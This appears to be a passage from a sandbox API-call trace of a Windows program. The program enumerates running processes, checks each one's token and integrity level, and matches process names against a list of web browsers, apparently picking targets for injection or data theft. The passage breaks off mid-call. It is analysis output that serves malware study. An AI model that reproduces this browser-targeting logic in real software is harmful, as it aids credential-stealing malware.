lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.477] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.477] GetLastError () returned 0x7a [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.477] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.477] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.477] CloseHandle (hObject=0xb8) returned 1 [0315.477] CloseHandle (hObject=0xb4) returned 1 [0315.477] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0315.477] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0315.477] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0315.477] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0315.477] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0315.477] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0315.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0315.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0315.477] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.477] GetLastError () returned 0x7a [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.477] CloseHandle (hObject=0xb8) returned 1 [0315.478] CloseHandle (hObject=0xb4) returned 1 [0315.478] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0315.478] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97a80, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.478] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.478] GetLastError () returned 0x7a [0315.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.478] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.478] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.478] CloseHandle (hObject=0xb8) returned 1 [0315.478] CloseHandle (hObject=0xb4) returned 1 [0315.478] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.478] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.478] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0315.478] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.478] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.478] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0315.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0315.478] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.478] GetLastError () returned 0x7a [0315.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.478] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.478] CloseHandle (hObject=0xb8) returned 1 [0315.478] CloseHandle (hObject=0xb4) returned 1 [0315.478] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0315.478] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e28, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.479] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.479] GetLastError () returned 0x7a [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.479] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.479] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.479] CloseHandle (hObject=0xb8) returned 1 [0315.479] CloseHandle (hObject=0xb4) returned 1 [0315.479] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0315.479] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0315.479] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0315.479] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0315.479] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0315.479] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0315.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0315.479] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.479] GetLastError () returned 0x7a [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.479] CloseHandle (hObject=0xb8) returned 1 [0315.479] CloseHandle (hObject=0xb4) returned 1 [0315.479] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0315.479] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97fc0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.479] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.479] GetLastError () returned 0x7a [0315.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.480] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.480] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.480] CloseHandle (hObject=0xb8) returned 1 [0315.480] CloseHandle (hObject=0xb4) returned 1 [0315.480] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0315.480] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0315.480] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0315.480] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0315.480] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0315.480] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0315.480] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0315.480] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0317.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xac00) returned 0xc0000004 [0317.483] VirtualAlloc (lpAddress=0x0, dwSize=0xbc00, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0317.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbc00, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0317.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0317.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0317.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0317.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0317.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0317.484] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.484] GetLastError () returned 0x7a [0317.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.484] CloseHandle (hObject=0xb8) returned 1 [0317.484] CloseHandle (hObject=0xb4) returned 1 [0317.484] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0317.484] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98518, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.484] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.484] GetLastError () returned 0x7a [0317.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.484] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.484] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.484] CloseHandle (hObject=0xb8) returned 1 [0317.484] CloseHandle (hObject=0xb4) returned 1 [0317.485] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0317.485] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0317.485] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0317.485] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0317.485] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0317.485] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0317.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0317.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0317.485] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.485] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.485] GetLastError () returned 0x7a [0317.485] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.485] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.485] CloseHandle (hObject=0xb8) returned 1 [0317.485] CloseHandle (hObject=0xb4) returned 1 [0317.485] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0317.485] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96960, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.485] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.485] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.485] GetLastError () returned 0x7a [0317.485] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.485] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.485] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.485] CloseHandle (hObject=0xb8) returned 1 [0317.485] CloseHandle (hObject=0xb4) returned 1 [0317.485] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0317.485] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0317.485] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0317.485] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0317.485] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0317.485] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0317.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0317.486] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.486] GetLastError () returned 0x7a [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0317.486] CloseHandle (hObject=0xb8) returned 1 [0317.486] CloseHandle (hObject=0xb4) returned 1 [0317.486] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0317.486] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96fe0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.486] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0317.486] GetLastError () returned 0x7a [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0317.486] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0317.486] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0317.486] CloseHandle (hObject=0xb8) returned 1 [0317.486] CloseHandle (hObject=0xb4) returned 1 [0317.486] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0317.486] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0317.486] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0317.486] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0317.486] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0317.486] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0317.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0317.486] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0317.486] GetLastError () returned 0x7a [0317.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0317.486] GetTokenInformation (in: TokenHandle=0xb8, 